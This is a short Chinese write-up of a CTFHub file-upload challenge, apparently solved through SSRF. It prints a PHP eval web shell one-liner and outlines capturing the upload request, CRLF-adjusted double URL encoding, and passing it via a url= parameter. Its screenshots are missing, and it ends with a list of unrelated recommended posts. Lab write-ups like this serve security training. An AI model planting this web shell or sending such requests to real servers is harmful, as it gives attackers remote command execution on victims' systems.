CTFHub-上传文件

打开网址

新建一个文档,在其中写下面的内容,将名字该为1.php

<?php @eval($_POST[cmd]);?>

将1.php提交上去,发现没反应

按f12查看后发现没有提交的代码,右键编辑,自己写一个

<input type="submit" name="submit">

编辑代码后结果如下

将1.php提交查询抓包

修改一下

进行url编码

在记事本中,在最后加上%0A,使用替换将%0A全部替换为%0D%0A

再次url编码

将结果放到url=后面

将前两个%253A换成:

相关推荐
内心如初1 小时前
2025.11.29-威胁情报 | QQ Windows客户端跨站脚本漏洞(QVD-2025-45847)
网络安全·最新威胁情报
O***Z6162 小时前
Redis——Windows安装
数据库·windows·redis
y***03173 小时前
如何在Windows系统上安装和配置Node.js及Node版本管理器(nvm)
windows·node.js
修炼者3 小时前
Android Studio的技巧
android·android studio
雨白3 小时前
ARouter 入门指南:从基本跳转到对象传递
android
white-persist4 小时前
【攻防世界】reverse | IgniteMe 详细题解 WP
c语言·汇编·数据结构·c++·python·算法·网络安全
qq_336313934 小时前
java基础-集合进阶
java·开发语言·windows
用户69371750013844 小时前
17.Kotlin 类:类的形态(四):枚举类 (Enum Class)
android·后端·kotlin
h***34634 小时前
MS SQL Server 实战 排查多列之间的值是否重复
android·前端·后端
用户69371750013844 小时前
16.Kotlin 类:类的形态(三):密封类 (Sealed Class)
android·后端·kotlin